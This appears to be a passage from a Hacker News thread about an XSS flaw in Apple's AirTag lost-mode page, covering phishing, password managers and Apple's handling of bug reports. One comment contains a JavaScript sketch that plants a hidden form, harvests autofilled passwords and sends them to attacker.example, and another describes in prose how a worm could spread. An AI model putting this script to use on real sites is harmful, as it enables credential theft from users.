              | Many people won't know, notice, or look twice. It doesn't
              | help that many popular services use weird URL shorteners,
              | so some weird-looking URL is normal now.
        
           | jjulius wrote:
           | >... you know you can trust it. If the URL is someone else,
           | you know not to trust it.
           | 
           | If HN readers are the "you" here, then that's accurate. If
           | you're referring to your average person, then I would argue
           | that the majority don't know this.
        
             | rjmunro wrote:
              | Sadly that is true. Luckily, if they are using a password
              | manager, it will do the right thing.
              | 
              | Some work has been done on UX here. Apple seems to hide the
              | URL and show only the domain name on iOS sometimes, which
              | is interesting, but annoying. Firefox colour-codes the
              | domain name part in the URL bar, but it's pretty subtle.
        
             | dividedbyzero wrote:
             | > If HN readers are the "you" here, then that's accurate.
             | 
              | Unless it's something very obviously shady, I could see
              | myself falling for something like this.
        
           | londons_explore wrote:
           | > construct a fake Apple login page inside the apple.com
           | domain
           | 
            | Usually you don't even need to do that. As soon as you have
            | script running inside apple.com, you can get the password
            | manager to auto-fill the password, log in, steal the login
            | cookie, and do whatever you like, all with nothing visible to
            | the user.
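            | 
            | A sketch of that idea (field names are hypothetical, and real
            | password managers vary in whether they fill without user
            | interaction):
            | 
            |   // Injected script plants an invisible login form; if the
            |   // password manager autofills it, the value can be read
            |   // out and exfiltrated.
            |   const f = document.createElement('form');
            |   f.innerHTML = `
            |     <input name="u" autocomplete="username">
            |     <input name="p" type="password"
            |            autocomplete="current-password">`;
            |   f.style.display = 'none';
            |   document.body.appendChild(f);
            |   setTimeout(() => {
            |     const pw = f.querySelector('[type=password]').value;
            |     if (pw) new Image().src =
            |       'https://attacker.example/x?p=' +
            |       encodeURIComponent(pw);
            |   }, 2000);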
        
             | judge2020 wrote:
              | Once it's fixed this won't be possible, in which case a
              | fake Apple sign-in domain will be the best vector.
        
           | PartiallyTyped wrote:
            | Re URL redirect:
            | 
            | I think you are putting too much faith in the average person
            | noticing the URL, given how susceptible humans are to
            | phishing attacks.
            | 
            | Re XSS: how could a worm in this case go from one AirTag to
            | another?
        
             | jameshart wrote:
             | Password managers and persistent auth cookies are why
             | getting onto the domain matters.
             | 
              | I guess the posited worm would make use of the fact that an
              | authenticated apple.com user can inject a payload by
              | marking an AirTag as lost and setting its phone number. If
              | that payload runs on an apple.com page on the victim's
              | device, it then gets some new apple.com credentials; if the
              | victim _also_ has any AirTags, it can mark them as lost and
              | inject the payload into their phone number fields.
              | 
              | Requires the AirTag to be scanned by another AirTag owner,
              | obviously, and it's unclear who would scan _their_ AirTag.
              | Overall, a good example of how to think about how viral
              | reproduction methods can lead to very different replication
              | rates depending on population characteristics and behavior.
        
       | Karupan wrote:
       | Apple has become too big to fail. Most customers and shareholders
       | don't care about security issues, responsible disclosure or bug
       | bounty programs. And given Apple's ultra secretive workplace
       | policies, I don't have a lot of hope that people who actually
       | care within the company can make any significant change either.
        
         | coldcode wrote:
          | Ever try to ship thousands of SDKs and new OSes at the same
          | time every year, build new hardware, even chips, keep dev
          | pipelines going for years in advance, and keep it all from
          | being plastered over HN and Reddit? It's a miracle anything
          | works.
          | 
          | It's probably a management nightmare to keep all this moving,
          | and clearly parts of Apple are likely poorly managed. I worked
          | there 25 years ago when it was going out of business (before
          | Steve), and it was already a complicated mess.
          | 
          | That does not, of course, mean they shouldn't run a bug bounty
          | program that works. You'd think that someone would care in a
          | company that values privacy. But if you have to deal with
          | 50,000 different simultaneous issues, some are likely to fall
          | through the cracks.
         | 
         | My last job was at a huge company with even more employees (not
         | tech but built a lot in-house) and you'd be amazed at how much
         | crap is never addressed that seemed obvious to us low level
         | people.
        
         | ryanlol wrote:
         | > Most customers and shareholders don't care about security
         | issues, responsible disclosure or bug bounty programs.
         | 
         | This applies to just about every company.
        
       | chmod775 wrote:
        | If this keeps up, in about another week I'll run out of fingers
        | to count the number of security issues Apple has mismanaged
        | recently - that we know about.
        
         | [deleted]
        
       ___________________________________________________________________
       (page generated 2021-09-29 23:02 UTC)